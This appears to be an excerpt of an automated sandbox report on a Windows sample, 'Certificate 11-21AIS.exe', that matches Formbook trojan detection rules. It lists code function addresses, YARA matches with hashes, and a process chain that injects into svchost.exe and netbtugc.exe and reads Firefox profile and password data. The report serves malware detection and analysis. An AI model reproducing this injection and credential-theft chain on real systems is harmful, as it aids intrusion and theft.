            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EE4F61_2_037EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FAB401_2_037FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F6BD71_2_037F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373EA801_2_0373EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037569621_2_03756962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380A9A61_2_0380A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037429A01_2_037429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374A8401_2_0374A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037428401_2_03742840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0376E8F01_2_0376E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037268B81_2_037268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B4F401_2_037B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03760F301_2_03760F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E2F301_2_037E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03782F281_2_03782F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03732FC81_2_03732FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037BEFA01_2_037BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740E591_2_03740E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FEE261_2_037FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FEEDB1_2_037FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03752E901_2_03752E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FCE931_2_037FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DCD1F1_2_037DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374AD001_2_0374AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0373ADE01_2_0373ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03758DBF1_2_03758DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03740C001_2_03740C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03730CF21_2_03730CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E0CB51_2_037E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372D34C1_2_0372D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F132D1_2_037F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0378739A1_2_0378739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375D2F01_2_0375D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E12ED1_2_037E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375B2C01_2_0375B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037452A01_2_037452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0372F1721_2_0372F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377516C1_2_0377516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0374B1B01_2_0374B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0380B16B1_2_0380B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F70E91_2_037F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF0E01_2_037FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EF0CC1_2_037EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037470C01_2_037470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF7B01_2_037FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037856301_2_03785630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F16CC1_2_037F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F75711_2_037F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038095C31_2_038095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DD5B01_2_037DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037314601_2_03731460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FF43F1_2_037FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFB761_2_037FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B5BF01_2_037B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0377DBF91_2_0377DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375FB801_2_0375FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B3A6C1_2_037B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFA491_2_037FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F7A461_2_037F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037EDAC61_2_037EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037DDAAC1_2_037DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03785AA01_2_03785AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037E1AA31_2_037E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037499501_2_03749950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375B9501_2_0375B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037D59101_2_037D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037AD8001_2_037AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037438E01_2_037438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFF091_2_037FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03703FD21_2_03703FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03703FD51_2_03703FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFFB11_2_037FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03741F921_2_03741F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03749EB01_2_03749EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F7D731_2_037F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037F1D5A1_2_037F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03743D401_2_03743D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0375FDC01_2_0375FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037B9C321_2_037B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_037FFCF21_2_037FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367A3523_2_0367A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036803E63_2_036803E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035CE3F03_2_035CE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036602743_2_03660274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036402C03_2_036402C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036481583_2_03648158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035B01003_2_035B0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0365A1183_2_0365A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036781CC3_2_036781CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036801AA3_2_036801AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036741A23_2_036741A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036520003_2_03652000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035E47503_2_035E4750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C07703_2_035C0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035BC7C03_2_035BC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035DC6E03_2_035DC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C05353_2_035C0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036805913_2_03680591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036724463_2_03672446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036644203_2_03664420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0366E4F63_2_0366E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367AB403_2_0367AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03676BD73_2_03676BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035BEA803_2_035BEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035D69623_2_035D6962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0368A9A63_2_0368A9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C29A03_2_035C29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035CA8403_2_035CA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C28403_2_035C2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035EE8F03_2_035EE8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035A68B83_2_035A68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03634F403_2_03634F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03602F283_2_03602F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03662F303_2_03662F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035E0F303_2_035E0F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035B2FC83_2_035B2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0363EFA03_2_0363EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C0E593_2_035C0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367EE263_2_0367EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367EEDB3_2_0367EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035D2E903_2_035D2E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367CE933_2_0367CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035CAD003_2_035CAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0365CD1F3_2_0365CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035BADE03_2_035BADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035D8DBF3_2_035D8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C0C003_2_035C0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035B0CF23_2_035B0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03660CB53_2_03660CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035AD34C3_2_035AD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367132D3_2_0367132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0360739A3_2_0360739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036612ED3_2_036612ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035DB2C03_2_035DB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035DD2F03_2_035DD2F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C52A03_2_035C52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0368B16B3_2_0368B16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035AF1723_2_035AF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035F516C3_2_035F516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035CB1B03_2_035CB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367F0E03_2_0367F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036770E93_2_036770E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C70C03_2_035C70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0366F0CC3_2_0366F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367F7B03_2_0367F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036056303_2_03605630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036716CC3_2_036716CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036775713_2_03677571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036895C33_2_036895C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0365D5B03_2_0365D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035B14603_2_035B1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367F43F3_2_0367F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367FB763_2_0367FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03635BF03_2_03635BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035FDBF93_2_035FDBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035DFB803_2_035DFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03633A6C3_2_03633A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03677A463_2_03677A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367FA493_2_0367FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0366DAC63_2_0366DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03605AA03_2_03605AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03661AA33_2_03661AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0365DAAC3_2_0365DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C99503_2_035C9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035DB9503_2_035DB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_036559103_2_03655910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0362D8003_2_0362D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C38E03_2_035C38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367FF093_2_0367FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03583FD23_2_03583FD2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03583FD53_2_03583FD5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C1F923_2_035C1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367FFB13_2_0367FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C9EB03_2_035C9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03677D733_2_03677D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035C3D403_2_035C3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03671D5A3_2_03671D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_035DFDC03_2_035DFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_03639C323_2_03639C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_0367FCF23_2_0367FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BB15E03_2_02BB15E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BAC7D03_2_02BAC7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BAC7C73_2_02BAC7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BAAA703_2_02BAAA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BAC9F03_2_02BAC9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BB30F03_2_02BB30F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BB30EE3_2_02BB30EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_02BC9FD03_2_02BC9FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033CA0AF3_2_033CA0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033CB9D63_2_033CB9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033CB8B43_2_033CB8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033CBD6C3_2_033CBD6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 3_2_033CADD83_2_033CADD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03775130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03787E54 appears 107 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0372B970 appears 262 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037BF290 appears 103 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 037AEA12 appears 86 times
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: String function: 008EF8A0 appears 35 times
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: String function: 008E6AC0 appears 42 times
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: String function: 008DEC2F appears 68 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0362EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03607E54 appears 107 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 035AB970 appears 262 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 035F5130 appears 58 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0363F290 appears 103 times
            Source: Certificate 11-21AIS.exe, 00000000.00000003.1686058076.000000000397D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-21AIS.exe
            Source: Certificate 11-21AIS.exe, 00000000.00000003.1688224868.0000000003823000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Certificate 11-21AIS.exe
            Source: Certificate 11-21AIS.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1823875661.0000000003590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1823341522.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4143480328.0000000002BA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4143880613.0000000003030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.4146974677.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4144988043.0000000003170000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.4144911596.00000000039E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000001.00000002.1824475216.0000000005200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@14/7
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0090CE7A GetLastError,FormatMessageW,0_2_0090CE7A
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008FAB84 AdjustTokenPrivileges,CloseHandle,0_2_008FAB84
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008FB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_008FB134
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0090E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0090E1FD
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_00906532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00906532
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_0091C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0091C18C
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeCode function: 0_2_008C406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008C406B
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeFile created: C:\Users\user\AppData\Local\Temp\autFF01.tmpJump to behavior
            Source: Certificate 11-21AIS.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000003.00000002.4143985977.0000000003107000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000003.00000003.2009565626.0000000003107000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Certificate 11-21AIS.exeReversingLabs: Detection: 60%
            Source: unknownProcess created: C:\Users\user\Desktop\Certificate 11-21AIS.exe "C:\Users\user\Desktop\Certificate 11-21AIS.exe"
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-21AIS.exe"
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Certificate 11-21AIS.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Certificate 11-21AIS.exe"Jump to behavior
            Source: C:\Program Files (x86)\rieAPwQKXdCLBXZRnXqsuvsqsEMPPoivjWOZkxysEgwfpPHkyk\YpYSxBPTXgWuOtxBGIerqOSW.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
